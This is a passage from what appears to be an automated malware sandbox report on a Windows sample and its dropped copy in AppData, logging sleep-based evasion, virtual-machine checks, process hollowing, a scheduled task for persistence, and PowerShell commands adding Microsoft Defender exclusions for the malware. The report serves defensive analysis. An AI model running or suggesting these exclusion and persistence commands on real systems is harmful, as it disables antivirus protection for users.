                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97909s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97796s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97687s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97565s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97453s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97334s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97192s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -97078s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96968s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96858s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96750s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96640s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96531s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96421s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96312s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96202s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -96093s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -95984s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -95873s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -95765s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -95656s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -95546s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199969s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199844s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199734s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199625s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199516s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199407s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199282s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199157s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1199047s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -1198938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7560 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99661s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99416s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -99093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98982s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98764s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98629s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -98062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97952s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97606s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97499s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97279s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -97062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96952s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96728s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96620s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96296s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -96077s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1199063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1198953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1198839s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1198734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1198625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940 Thread sleep time: -1198515s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99849Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99718Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99609Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99390Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99280Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99167Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99059Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98828Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98718Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98390Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98246Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97909Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97565Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97334Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97192Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97078Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96968Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96858Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96750Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96640Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96531Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96421Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96312Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96202Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96093Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95984Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95873Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95765Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95656Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95546Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199969Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199844Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199734Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199625Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199516Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199407Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199282Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199157Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199047Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1198938Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99661
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99416
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99312
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99203
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99093
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98982
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98874
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98764
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98629
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98500
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98390
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98281
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98171
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98062
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97952
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97843
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97606
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97499
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97390
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97279
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97171
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97062
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96952
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96843
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96728
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96620
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96515
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96406
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96296
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96187
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96077
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199875
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199766
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199641
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199313
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199188
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199063
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198839
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198625
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198515
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                      Source: HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                      Source: HHhSyZN.exe, 00000009.00000002.1767206531.0000000001276000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: HHhSyZN.exe, 00000009.00000002.1777549130.0000000009A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory written: C:\Users\user\Desktop\kAsh3nmsgs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory written: C:\Users\user\AppData\Roaming\HHhSyZN.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Users\user\AppData\Roaming\HHhSyZN.exe "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Users\user\Desktop\kAsh3nmsgs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
